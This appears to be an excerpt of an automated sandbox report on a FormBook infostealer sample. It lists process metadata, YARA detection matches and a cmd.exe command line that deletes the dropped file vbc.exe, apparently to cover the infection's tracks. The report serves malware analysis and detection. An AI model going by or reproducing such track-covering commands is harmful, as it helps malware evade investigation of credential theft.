                                                  Imagebase:0xf20000
                                                  File size:2972672 bytes
                                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:18:12:15
                                                  Start date:25/11/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del "C:\Users\Public\vbc.exe"
                                                  Imagebase:0x4a730000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis
